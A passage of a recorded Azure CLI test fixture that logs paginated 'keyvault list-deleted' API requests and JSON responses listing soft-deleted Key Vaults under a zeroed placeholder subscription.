qdh5idgj3/providers/Microsoft.KeyVault/vaults/vault4-veli246l32qrp","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T08:21:55Z","scheduledPurgeDate":"2020-06-17T08:21:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-fydfuvmolj6de","name":"vault3-fydfuvmolj6de","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_ucr4ni4nfgy4w6muytgmr7oxmmvn5tiqll/providers/Microsoft.KeyVault/vaults/vault3-fydfuvmolj6de","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T08:19:43Z","scheduledPurgeDate":"2020-06-17T08:19:43Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-tm4rgp2w57rj5","name":"vault3-tm4rgp2w57rj5","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_7zuf23lm7myq7fqhoenr2uwfd4p3xmp36k/providers/Microsoft.KeyVault/vaults/vault3-tm4rgp2w57rj5","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T03:59:53Z","scheduledPurgeDate":"2020-06-17T03:59:53Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-7g7efccp4q34l","name":"vault3-7g7efccp4q34l","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_4mcfmym4gnbho5hwurc5kr443k5v53zo45/providers/Microsoft.KeyVault/vaults/vault3-7g7efccp4q34l","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T03:56:36Z","scheduledPurgeDate":"2020-06-17T03:56:36Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/bim-kv","name":"bim-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv","location":"eastus2euap","tags":{},"deletionDate":"2020-01-10T17:14:22Z","scheduledPurgeDate":"2020-04-09T17:14:22Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/bim-kv2","name":"bim-kv2","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv2","location":"eastus2euap","tags":{},"deletionDate":"2020-01-09T17:14:57Z","scheduledPurgeDate":"2020-04-08T17:14:57Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/yugangwcan2-kv","name":"yugangwcan2-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwcan2/providers/Microsoft.KeyVault/vaults/yugangwcan2-kv","location":"eastus2euap","tags":{},"deletionDate":"2019-12-30T17:13:53Z","scheduledPurgeDate":"2020-03-29T17:13:53Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/yugangwcan-kv","name":"yugangwcan-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwcan/providers/Microsoft.KeyVault/vaults/yugangwcan-kv","location":"eastus2euap","tags":{},"deletionDate":"2019-12-27T17:13:49Z","scheduledPurgeDate":"2020-03-26T17:13:49Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/vault158711","name":"vault158711","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yurg/providers/Microsoft.KeyVault/vaults/vault158711","location":"centraluseuap","tags":{},"deletionDate":"2020-01-13T17:11:21Z","scheduledPurgeDate":"2020-04-12T17:11:21Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3ZTRbtowFIbfBU27GsUJZIVK1RRiZwvrOZmNnQruIISUmEJF0ia46rvvbKq2ZyiSfXGkI1v%2b%2fJ3%2ftXcouuZud7B17%2ba1J8K5NvPeTe%2bhaZ7qm8HgcXVYlcVjcWiuVu75VFzlx8dB%2fbyu89PuqdkdD%2fWArb3t19G11%2ffWW9YfbTar%2fqrIh%2f18PfGv%2fS2bBBM2eDodX3ab4lQPYJefjvVx21z9LM7Z6nnfDDbFvmiKzd%2bi%2frZ62vVfqJMOv%2fWZN%2bkzWt7nT7WlG4%2b2ONwam92rbKaVUbEWmZmbSXpn9mbLEw90eQaXDFOee1CVLbiQ6mysROKQL2NZ5b50tkUuO6VLJm0cozae1MspGtNJBr0v7xz8Dw6iS7n0oco9rKRLeUhwlmNkpgOheCpUBGwmUCwjyRI%2fNWKIPOPSPUTIZIA8JBDz1OgfkUCtwrsLEIMv2lQnLWgSRBvaszFy60gaYoRcES8UEChtGVrTAjcBsMUQrCCZEuJxLy5gQDp0Zkhv7sCVjAalS3U2TjnGUMWxMtKhgRHyPUddjv54Qx6NlJhFsio9MOadw6VoQTjyDkgNcCZAR9%2bt92PpZjw1skUWf08NdCjMWdkkAB76wGccBUZKb6ag7f%2b8ECb89cEz44y8dODsEDi06KyPbjpWVRhAtWilfojALGhGlgJsLJRQU8oJ6k3OymSCgpVg%2fPPiEnCAAx81UJQaGhWKBBdTZGwEOtEqvoxQUGRwOKNIPMUFI08CxadTZUUAOu%2b9vf0G"}' headers: cache-control: - no-cache content-length: - '16244' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:23 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 7021dd6a-e3ca-425a-971e-c3664e1997fe - ae478eba-2b4a-49a0-b6b7-cada01eec80d - a66db322-a3ba-468c-ae5c-bc58d33db812 - a60837c0-a9c1-4655-b76c-b93fdec9569d - f88caa5a-5f10-4b4e-9555-b550f6b40020 - b07d1ca6-a221-4e1b-b351-724878855076 - f99b3656-3006-4b49-9cc8-be07787c27b3 - d5fcb918-452b-4ce6-9d54-e1dd3686a2e4 - 5041fa6f-0e02-48cc-8078-cacaa0024e3b - b9be6653-e58c-4387-a17c-ddfc0fd594be - 4e0ad2fa-a1cd-4402-96d8-c812faa172a8 - b7219c86-9a33-403f-8b51-07fa34b162c0 - 32ea9ca6-20ac-4ce5-a031-a25cee995381 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3ZTRbtowFIbfBU27GsUJZIVK1RRiZwvrOZmNnQruIISUmEJF0ia46rvvbKq2ZyiSfXGkI1v%2B%2FJ3%2FtXcouuZud7B17%2Ba1J8K5NvPeTe%2BhaZ7qm8HgcXVYlcVjcWiuVu75VFzlx8dB%2Fbyu89PuqdkdD%2FWArb3t19G11%2FfWW9YfbTar%2FqrIh%2F18PfGv%2FS2bBBM2eDodX3ab4lQPYJefjvVx21z9LM7Z6nnfDDbFvmiKzd%2Bi%2FrZ62vVfqJMOv%2FWZN%2BkzWt7nT7WlG4%2B2ONwam92rbKaVUbEWmZmbSXpn9mbLEw90eQaXDFOee1CVLbiQ6mysROKQL2NZ5b50tkUuO6VLJm0cozae1MspGtNJBr0v7xz8Dw6iS7n0oco9rKRLeUhwlmNkpgOheCpUBGwmUCwjyRI%2FNWKIPOPSPUTIZIA8JBDz1OgfkUCtwrsLEIMv2lQnLWgSRBvaszFy60gaYoRcES8UEChtGVrTAjcBsMUQrCCZEuJxLy5gQDp0Zkhv7sCVjAalS3U2TjnGUMWxMtKhgRHyPUddjv54Qx6NlJhFsio9MOadw6VoQTjyDkgNcCZAR9%2Bt92PpZjw1skUWf08NdCjMWdkkAB76wGccBUZKb6ag7f%2B8ECb89cEz44y8dODsEDi06KyPbjpWVRhAtWilfojALGhGlgJsLJRQU8oJ6k3OymSCgpVg%2FPPiEnCAAx81UJQaGhWKBBdTZGwEOtEqvoxQUGRwOKNIPMUFI08CxadTZUUAOu%2B9vf0G response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/yugangw30-kv","name":"yugangw30-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangw30/providers/Microsoft.KeyVault/vaults/yugangw30-kv","location":"eastus","tags":{},"deletionDate":"2020-01-14T17:11:36Z","scheduledPurgeDate":"2020-04-13T17:11:36Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/yugangweus-kv","name":"yugangweus-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangweus/providers/Microsoft.KeyVault/vaults/yugangweus-kv","location":"eastus","tags":{},"deletionDate":"2020-01-06T17:11:19Z","scheduledPurgeDate":"2020-04-05T17:11:19Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestmpgpcmfg5ferwjtd7","name":"clitestmpgpcmfg5ferwjtd7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rg5ocvemzeclhbmzvjaqjuryoo2ycn6d4p7lfowo4bve3zw7nywqhbek4rjivpgefby/providers/Microsoft.KeyVault/vaults/clitestmpgpcmfg5ferwjtd7","location":"southcentralus","tags":{},"deletionDate":"2020-02-14T14:43:22Z","scheduledPurgeDate":"2020-05-14T14:43:22Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestpvtzidcexzblc7yii","name":"clitestpvtzidcexzblc7yii","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgns6cnb4ky675fh7jemzdvryppkcqkyx7me4ew4bxqqjgekzf5yfqpijlbe2hinrpq/providers/Microsoft.KeyVault/vaults/clitestpvtzidcexzblc7yii","location":"southcentralus","tags":{},"deletionDate":"2020-02-13T14:50:58Z","scheduledPurgeDate":"2020-05-13T14:50:58Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitesth7jvdwnyw2btzj7st","name":"clitesth7jvdwnyw2btzj7st","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgb4q7gpye64anq7uvrymbn3lxumtgsk63xl53jhyzrfqkaaib3fori67xsdkc5v4yb/providers/Microsoft.KeyVault/vaults/clitesth7jvdwnyw2btzj7st","location":"southcentralus","tags":{},"deletionDate":"2020-02-13T14:47:06Z","scheduledPurgeDate":"2020-05-13T14:47:06Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestiyfq7ldbilkrrxkvi","name":"clitestiyfq7ldbilkrrxkvi","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rggfe3mnssff5y6yishyj6hkb4ut66hv6jggxzztcx3vvnpslbp2lggt3fs3wxif7wv/providers/Microsoft.KeyVault/vaults/clitestiyfq7ldbilkrrxkvi","location":"southcentralus","tags":{},"deletionDate":"2020-02-07T18:34:36Z","scheduledPurgeDate":"2020-05-07T18:34:36Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestihs3y3i2xodax3wuv","name":"clitestihs3y3i2xodax3wuv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgol3lio3snvp6u4p3t3whpmowdahv7kixxtgxxatuwygmgpxrrnrbbt7jxbz5qdi73/providers/Microsoft.KeyVault/vaults/clitestihs3y3i2xodax3wuv","location":"southcentralus","tags":{},"deletionDate":"2020-01-31T18:29:17Z","scheduledPurgeDate":"2020-04-30T18:29:17Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/sfrp-cli-kv-ofvikz5jdim3","name":"sfrp-cli-kv-ofvikz5jdim3","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rg4lxm3kpq6ckrkjkp5gjs6lqufzaqhjohskealwnjoioyr7ls2kn633at2idakhela/providers/Microsoft.KeyVault/vaults/sfrp-cli-kv-ofvikz5jdim3","location":"westus","tags":{},"deletionDate":"2020-03-20T18:24:06Z","scheduledPurgeDate":"2020-06-18T18:24:06Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/sfrp-cli-kv-6ftmoytefh2c","name":"sfrp-cli-kv-6ftmoytefh2c","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgx6nh2pbravqrjttueorhcdspcute7ycmxyup37dqtkjtee3eowtw3xd3moxf6p76p/providers/Microsoft.KeyVault/vaults/sfrp-cli-kv-6ftmoytefh2c","location":"westus","tags":{},"deletionDate":"2020-03-20T18:23:39Z","scheduledPurgeDate":"2020-06-18T18:23:39Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-keyvault-q52fwp","name":"cli-test-keyvault-q52fwp","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_ag_identityz2qav3ass3llh5xuti3rbnobmhs57eaxvr6j5r3ouwlmbe4vcuku22a/providers/Microsoft.KeyVault/vaults/cli-test-keyvault-q52fwp","location":"westus","tags":{},"deletionDate":"2020-03-20T18:22:06Z","scheduledPurgeDate":"2020-06-18T18:22:06Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitestislttmn3qyk2wsybb","name":"clitestislttmn3qyk2wsybb","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_sp_with_kv_existing_certvyl7dipvpoqc2pj7tksl4sns7nas73ks4artwbo36j/providers/Microsoft.KeyVault/vaults/clitestislttmn3qyk2wsybb","location":"westus","tags":{},"deletionDate":"2020-03-20T18:21:17Z","scheduledPurgeDate":"2020-06-18T18:21:17Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitestvlj37pcd24laayx5g","name":"clitestvlj37pcd24laayx5g","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_sp_with_kv_new_certlcpvmgojriyfsvibbogwwjgb6x6wbcw5hmcfe2cv27gmma6/providers/Microsoft.KeyVault/vaults/clitestvlj37pcd24laayx5g","location":"westus","tags":{},"deletionDate":"2020-03-20T18:21:07Z","scheduledPurgeDate":"2020-06-18T18:21:07Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-f7vl3ohmrgoqxj","name":"vault-f7vl3ohmrgoqxj","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_puytfw3xwlit4gqfr77wqm5frjjzjqxno72vyrppmb3ugo/providers/Microsoft.KeyVault/vaults/vault-f7vl3ohmrgoqxj","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T03:50:28Z","scheduledPurgeDate":"2020-06-17T03:50:28Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-c3sketdsfftb6","name":"vault3-c3sketdsfftb6","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_kr7izishpxsihbmvlwqn2lkgl7ilgqiqar/providers/Microsoft.KeyVault/vaults/vault3-c3sketdsfftb6","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T03:45:40Z","scheduledPurgeDate":"2020-06-17T03:45:40Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-hnkfzbeks4mn4","name":"vault3-hnkfzbeks4mn4","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_jimzgyy4k7hdwl6uvga4c4ewh6vs2atkct/providers/Microsoft.KeyVault/vaults/vault3-hnkfzbeks4mn4","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T03:42:10Z","scheduledPurgeDate":"2020-06-17T03:42:10Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-hisgfkgfra7ik","name":"vault3-hisgfkgfra7ik","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_wosuqu6dowuwd3tn5chpzvpmgua6my6goc/providers/Microsoft.KeyVault/vaults/vault3-hisgfkgfra7ik","location":"westcentralus","tags":{},"deletionDate":"2020-03-18T09:00:11Z","scheduledPurgeDate":"2020-06-16T09:00:11Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-o2iz2lwdvvp4b","name":"vault3-o2iz2lwdvvp4b","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_bbq3mfb6axicuyhmodv3sldo2dkczwv557/providers/Microsoft.KeyVault/vaults/vault3-o2iz2lwdvvp4b","location":"westcentralus","tags":{},"deletionDate":"2020-03-18T08:50:25Z","scheduledPurgeDate":"2020-06-16T08:50:25Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3ZPdbuIwEEbfJar2akP%2bYAtIVdViw5JlHNnYVPQuJE5IDAkioSSu%2bu5reAykufBIn2z5zJlvq5Jduyoq1VjTbwu%2frblYW1Nr37anZuo4x7iKc3mUVTuI9eUsB0l9dJrLrknOxakt6qpx3J2X%2fRk%2be7a3y1x7mKaxHcsksJPdxH%2f2M3cymrjO6Vx%2fFak8Nw4Uyblu6qwd%2fJP9Jr4cWieVB9nK9N40r%2fGpsL9M0lz%2b4rvexHZNeb%2beGmVerJWsXoTafLBNyJlgc443Yi0m0UocRIaWHvC8B60CQLgHtBwRroYRCsfAxZUIoSMRLoggmCA1IticEQ6AK5%2bVnzMqlpohYf221pHgf2eYcPa2egAePL8STl0o8SjiuU%2fK%2fZhwPKRa6QizBXAICNpeqTufAdrjCIk%2bQiliHPeEJ4bHB34ALzqiRQAlaCi3HXBqvCBjgsIZLbfGi%2fmC6rsXXoRUd%2fs7GD8AgwduiADfvLhxeBQtDI4kiO6jx9qsTE%2f059ggmDNMR6DCd9BmZRDtCF76JndlJXunZTojKO9oKayfn%2f8%3d"}' headers: cache-control: - no-cache content-length: - '10631' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:24 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 62e87519-858c-4f76-b492-457185118200 - 55e92399-d604-4cd7-89f8-a9c6eb59c706 - ce10beae-4d3c-4307-a8fa-48db41d0b7de - dee1dd42-c6ed-42fb-8cba-c8b69da5cb6a - e59dfac0-f0a2-4f91-bdab-876e0ac2deae - 4c1f1d40-956e-48ae-ab75-190d422e8053 - 8263903e-05ec-472a-a485-56b0e0bb5683 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3ZPdbuIwEEbfJar2akP%2BYAtIVdViw5JlHNnYVPQuJE5IDAkioSSu%2Bu5reAykufBIn2z5zJlvq5Jduyoq1VjTbwu%2FrblYW1Nr37anZuo4x7iKc3mUVTuI9eUsB0l9dJrLrknOxakt6qpx3J2X%2FRk%2Be7a3y1x7mKaxHcsksJPdxH%2F2M3cymrjO6Vx%2FFak8Nw4Uyblu6qwd%2FJP9Jr4cWieVB9nK9N40r%2FGpsL9M0lz%2B4rvexHZNeb%2BeGmVerJWsXoTafLBNyJlgc443Yi0m0UocRIaWHvC8B60CQLgHtBwRroYRCsfAxZUIoSMRLoggmCA1IticEQ6AK5%2BVnzMqlpohYf221pHgf2eYcPa2egAePL8STl0o8SjiuU%2FK%2FZhwPKRa6QizBXAICNpeqTufAdrjCIk%2BQiliHPeEJ4bHB34ALzqiRQAlaCi3HXBqvCBjgsIZLbfGi%2FmC6rsXXoRUd%2Fs7GD8AgwduiADfvLhxeBQtDI4kiO6jx9qsTE%2F059ggmDNMR6DCd9BmZRDtCF76JndlJXunZTojKO9oKayfn%2F8%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitesto7yp5n2dtetvglm23","name":"clitesto7yp5n2dtetvglm23","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgcill26amfusi3kz7ftz3lohxaqob6s557ugradue7zgebuvpul7mjgckprrgnsyz2/providers/Microsoft.KeyVault/vaults/clitesto7yp5n2dtetvglm23","location":"southcentralus","tags":{},"deletionDate":"2020-01-25T13:38:02Z","scheduledPurgeDate":"2020-04-24T13:38:02Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestmqngv7lbrztk7bbc4","name":"clitestmqngv7lbrztk7bbc4","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgth73vydmrjfc4emebkrvfiketb3fmv57kiof4xmsnk236gdkfvahmtbd5ybrj3ug3/providers/Microsoft.KeyVault/vaults/clitestmqngv7lbrztk7bbc4","location":"southcentralus","tags":{},"deletionDate":"2020-01-24T18:38:06Z","scheduledPurgeDate":"2020-04-23T18:38:06Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest3yd5tn7uis7qch3ky","name":"clitest3yd5tn7uis7qch3ky","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgjdmtseoyl36yy74woytt3m44sekyy73a3dz5gjtozye2yp7lpdtplpsazeufnztyo/providers/Microsoft.KeyVault/vaults/clitest3yd5tn7uis7qch3ky","location":"southcentralus","tags":{},"deletionDate":"2020-01-21T14:20:50Z","scheduledPurgeDate":"2020-04-20T14:20:50Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest25zikdxftsqvcoclg","name":"clitest25zikdxftsqvcoclg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgn3pmrkxxn6xrlmwxeei63np6e3znyqka7xbgfedlkbynmstjwls54ewoekm46oyhc/providers/Microsoft.KeyVault/vaults/clitest25zikdxftsqvcoclg","location":"southcentralus","tags":{},"deletionDate":"2020-01-21T07:55:05Z","scheduledPurgeDate":"2020-04-20T07:55:05Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest4lzkygkjffwji7wka","name":"clitest4lzkygkjffwji7wka","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgmugvwy6aggxk47padpy4r4j4kquzlofqfgf5nwqusaywvbg2d3mlnrn6qecgijn7a/providers/Microsoft.KeyVault/vaults/clitest4lzkygkjffwji7wka","location":"southcentralus","tags":{},"deletionDate":"2020-01-21T07:40:34Z","scheduledPurgeDate":"2020-04-20T07:40:34Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-r2rhgs7","name":"cli-test-kv-mgmt-r2rhgs7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmta7eda6k7bhttxyrvsgeqssooqxsgwnnoe4zlc3lcimvqot4hcjhi5/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-r2rhgs7","location":"westus","tags":{},"deletionDate":"2020-03-20T18:16:05Z","scheduledPurgeDate":"2020-06-18T18:16:05Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-q7pcnq","name":"cli-test-kv-se-sd-q7pcnq","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deleteqjz34acfii5akzlh6zw6p7xjowmrr643pjdoboq/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-q7pcnq","location":"westus","tags":{},"deletionDate":"2020-03-20T18:12:58Z","scheduledPurgeDate":"2020-06-18T18:12:58Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clivuvv7jjla5ir","name":"clivuvv7jjla5ir","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_cosmosdb_key_vault_key_uriwq3skwfjxw3ghoczcoucjbxhoyinnybprvw7la62/providers/Microsoft.KeyVault/vaults/clivuvv7jjla5ir","location":"westus","tags":{},"deletionDate":"2020-03-20T18:05:51Z","scheduledPurgeDate":"2020-06-18T18:05:51Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitests3cunbk2tennocddw","name":"clitests3cunbk2tennocddw","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgpxkyhablsdqbgmjskkb2wsixr2iksew55cwqf7v3tglbdfa4jv4oi4r6sguoeg5v7/providers/Microsoft.KeyVault/vaults/clitests3cunbk2tennocddw","location":"westus"